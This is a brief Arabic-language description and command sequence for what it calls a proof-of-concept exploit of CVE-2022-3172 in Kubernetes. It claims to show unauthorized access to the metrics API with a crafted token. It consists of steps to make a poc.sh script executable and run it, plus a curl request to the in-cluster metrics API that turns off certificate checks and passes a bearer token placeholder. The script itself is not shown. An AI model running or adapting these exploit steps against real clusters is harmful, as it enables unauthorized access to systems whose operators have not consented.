
استغلال إثبات المفهوم لـ CVE-2022-3172 في Kubernetes، يوضح الوصول غير المصرح به إلى واجهة برمجة تطبيقات المقاييس عبر رمز مصمم.
chmod +x poc.sh
./poc.sh
curl https://kubernetes.default.svc/apis/metrics.k8s.io/v2beta1/ -k -H "Authorization: Bearer {token}"